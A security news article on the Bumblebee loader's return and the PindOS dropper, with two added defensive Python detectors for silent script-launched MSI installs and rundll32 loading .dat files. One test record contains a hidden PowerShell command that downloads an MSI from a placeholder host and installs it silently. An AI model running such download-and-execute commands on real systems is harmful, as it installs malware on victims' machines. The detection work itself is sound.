
Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown


The Bumblebee malware loader, dormant since Europol's 'Operation Endgame' in May 2024, has resurfaced in new attacks. The loader, believed to have been developed by the TrickBot authors, first appeared in 2022 as a successor to the BazarLoader backdoor and is used to give ransomware groups an initial foothold in victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, typically disguised as legitimate software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. The payloads it delivers include Cobalt Strike beacons, information stealers, and ransomware.

Operation Endgame was a large-scale law enforcement action that seized and dismantled more than a hundred servers supporting malware loaders including IcedID, Pikabot, TrickBot, and Bumblebee. Bumblebee activity stopped after the takedown, but researchers at Netskope have since detected new samples, suggesting a resurgence.

The latest campaign starts with a phishing email that tricks the recipient into downloading a ZIP archive. Inside is a .LNK shortcut that launches PowerShell, which in turn downloads a malicious MSI file disguised as an NVIDIA driver update or a Midjourney installer.

The MSI is executed silently, with no installer UI, and Bumblebee uses it to load itself directly into memory rather than dropping a separate executable. The DLL unpacking routine and the way the configuration is extracted match earlier versions. The configuration encryption key in the new samples is "NEW_BLACK", and two campaign IDs were observed: "msi" and "lnk001". The key and campaign IDs are useful for clustering samples, but the operators can change them at will, so detection should rest on the delivery chain (LNK to PowerShell to a silent msiexec run of an MSI from a user-writable directory) rather than on those strings.
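The delivery chain above gives a detection hook that survives changes to the lure, the key and the campaign IDs. The following Python is an added example written for this page, not code from Netskope or from the Bumblebee authors. It reconstructs the process tree from constructed Sysmon-style process-creation records and flags an msiexec run that descends from a script host and is either silent or installs an MSI from a user-writable path; a benign installer launched from Downloads is included to show that it is not flagged. The user name, PIDs, file names and the example.invalid URL are invented for illustration.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# The first chain mirrors the delivery described in the post: the .lnk inside
# the ZIP launches PowerShell (parent explorer.exe), PowerShell fetches an MSI
# posing as an NVIDIA driver update into a user-writable folder and runs
# msiexec silently. The second msiexec is a benign comparison: a user
# double-clicking an installer in Downloads, no script host, visible UI.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 512, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://example.invalid/nvidia_update.msi '
            r'-OutFile $env:TEMP\nv.msi; msiexec /qn /i $env:TEMP\nv.msi"'},
    {"pid": 520, "ppid": 512, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /qn /i C:\Users\alice\AppData\Local\Temp\nv.msi"},
    {"pid": 700, "ppid": 400, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\alice\Downloads\7zip.msi"'},
]

# Interpreters that a .lnk or a dropper would use to stage the install.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# msiexec switches that suppress the installer UI.
QUIET_FLAG = re.compile(r"(?:^|\s)/(?:qn|qb|q|quiet|passive)\b", re.I)
# The .msi argument, quoted or bare.
MSI_PATH = re.compile(r'"([^"]+\.msi)"|(\S+\.msi)\b', re.I)
# Locations an unprivileged user (or a phishing payload) can write to.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Temp\\",
    re.I)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from the given process up to the root (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect_scripted_silent_msi(events):
    """Flag msiexec runs that a script host started and that are either
    silent (/qn and friends) or install an MSI from a user-writable path."""
    alerts = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe":
            continue
        m = MSI_PATH.search(e["cmd"])
        msi = (m.group(1) or m.group(2)) if m else ""
        parents = ancestry(events, e["pid"])[1:]
        scripted = any(p in SCRIPT_HOSTS for p in parents)
        quiet = bool(QUIET_FLAG.search(e["cmd"]))
        user_dir = bool(USER_WRITABLE.search(msi))
        if scripted and (quiet or user_dir):
            alerts.append({"pid": e["pid"], "msi": msi, "quiet": quiet,
                           "user_writable": user_dir, "ancestry": parents})
    return alerts


if __name__ == "__main__":
    for alert in detect_scripted_silent_msi(EVENTS):
        print(alert)
```

The rule deliberately requires a script-host ancestor: plenty of legitimate software-deployment tooling runs msiexec quietly, but it rarely does so from a PowerShell process that explorer.exe spawned when the user opened a shortcut.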

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.

New PindOS JavaScript Dropper Deploys Bumblebee, IcedID Malware

Security researchers have identified a new JavaScript-based malware dropper dubbed PindOS. Its job is to retrieve the next-stage payloads that carry the attackers' final payload onto a compromised machine.

Those payloads are Bumblebee and IcedID, two loaders commonly used in ransomware attacks. Both have a track record of deploying further malware, including ransomware, on compromised systems, and PindOS now serves as a delivery mechanism for them.

According to a report by cybersecurity firm Deep Instinct, PindOS is straightforward but effective.

It consists of a single function with four parameters that together download the payload, which can be either Bumblebee or the IcedID banking trojan, now repurposed as a malware loader. The dropper ships obfuscated, but once decoded it turns out to be surprisingly simple.

Its configuration specifies a user agent to use when downloading the DLL payload, two URLs, "URL1" and "URL2", where the payload is hosted, and a RunDLL parameter naming the exported function in the payload DLL that should be executed.

As the researchers note, the second URL parameter is a fallback: if fetching the payload from the first URL fails, PindOS tries the second. To run the payload, PindOS combines PowerShell commands with Microsoft's rundll32.exe, a signed system binary that adversaries routinely abuse to launch malicious code because it is present on every Windows host and is constantly seen in legitimate use.

PindOS thus rides on this living-off-the-land technique to execute the payload. The downloaded payload is written to "%appdata%/Microsoft/Templates/".

The payload is saved as a .DAT file with a randomized name of six digits. Notably, the operators generate samples on demand, so each download yields a file with a distinct hash. That defeats signature- and hash-based detection; defenders should instead look for the behaviour, such as rundll32.exe loading a .dat file from the Templates folder under a user's roaming profile, with a script host such as PowerShell or wscript.exe as the parent process.
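Because PindOS regenerates samples per download, the file hash is useless as an indicator, but the execution pattern described above is stable. The following Python is an added example and not Deep Instinct's or the dropper's own code. It parses rundll32 command lines as they appear in process-creation telemetry (quoted or bare module path, comma-separated entry point, trailing arguments) and flags the PindOS pattern: a six-digit .dat under %appdata%\Microsoft\Templates launched by rundll32 with a named export, spawned from a script host. It also generalizes to any rundll32 launch of a non-DLL file from a user profile. The command lines, the user name alice and the export names PluginInit and DllRegisterServer are constructed for the example; the page does not name the real export, only that the RunDLL parameter selects it.

```python
import re

# Constructed process-creation records (not real telemetry). The first two
# mirror the PindOS behaviour described in the post: a script host hands a
# six-digit .dat file under %appdata%\Microsoft\Templates to rundll32 with
# the export named by the dropper's RunDLL parameter (export names invented).
# The last two are ordinary rundll32 uses from explorer.exe for comparison.
SAMPLES = [
    {"parent": "powershell.exe",
     "cmd": r"rundll32.exe C:\Users\alice\AppData\Roaming\Microsoft\Templates\482913.dat,PluginInit"},
    {"parent": "powershell.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" "C:\Users\alice\AppData\Roaming\Microsoft\Templates\117204.dat",DllRegisterServer'},
    {"parent": "explorer.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"},
    {"parent": "explorer.exe",
     "cmd": r'rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry /in /n "\\srv\p1"'},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# %appdata% expands to C:\Users\<user>\AppData\Roaming; accept the expanded
# and unexpanded forms and either slash, since the dropper used forward slashes.
PINDOS_DROP = re.compile(
    r"(?:\\AppData\\Roaming|%appdata%)[\\/]Microsoft[\\/]Templates[\\/]\d{6}\.dat$", re.I)
USER_PROFILE = re.compile(
    r"(?:\\Users\\[^\\]+\\|%(?:appdata|localappdata|temp|userprofile)%)", re.I)


def parse_rundll32(cmdline):
    """Split 'rundll32[.exe] <module>,<entry> [args]' into (module, entry, args).
    Handles a quoted program path, a quoted module path and whitespace on either
    side of the comma. This approximates rundll32's own parsing and is meant for
    command lines as logged by Sysmon or an EDR, not for every corner case."""
    s = cmdline.strip()
    if s.startswith('"'):                       # quoted program path
        s = s[s.find('"', 1) + 1:]
    else:                                       # bare program name
        s = s.split(None, 1)[1] if re.search(r"\s", s) else ""
    s = s.lstrip()
    if s.startswith('"'):                       # quoted module path
        end = s.find('"', 1)
        module, s = s[1:end], s[end + 1:]
    else:                                       # bare path ends at comma/space
        m = re.match(r"[^,\s]*", s)
        module, s = m.group(0), s[m.end():]
    s = s.lstrip()
    if not s.startswith(","):
        return module, "", s                    # no entry point; rundll32 would bail
    entry, _, args = s[1:].lstrip().partition(" ")
    return module, entry, args.strip()


def classify(cmdline, parent_image):
    """Return the reasons a rundll32 launch looks suspicious (empty = clean)."""
    module, entry, _ = parse_rundll32(cmdline)
    reasons = []
    if PINDOS_DROP.search(module):
        reasons.append("PindOS drop path: six-digit .dat under %appdata%\\Microsoft\\Templates")
    if not module.lower().endswith((".dll", ".cpl", ".ocx")):
        reasons.append("rundll32 loading a non-DLL extension: ." + module.rsplit(".", 1)[-1])
    if USER_PROFILE.search(module):
        reasons.append("module lives in a user-writable profile path")
    if parent_image.lower() in SCRIPT_HOSTS:
        reasons.append("spawned by script host " + parent_image + " (PindOS uses PowerShell)")
    return reasons


if __name__ == "__main__":
    for s in SAMPLES:
        module, entry, args = parse_rundll32(s["cmd"])
        print(module, entry, args, classify(s["cmd"], s["parent"]), sep=" | ")
```

The entry point is parsed out so a hunt can pivot on it: once one sample's RunDLL export is known, every other on-demand build that keeps the same export is caught regardless of its hash or its random six-digit filename.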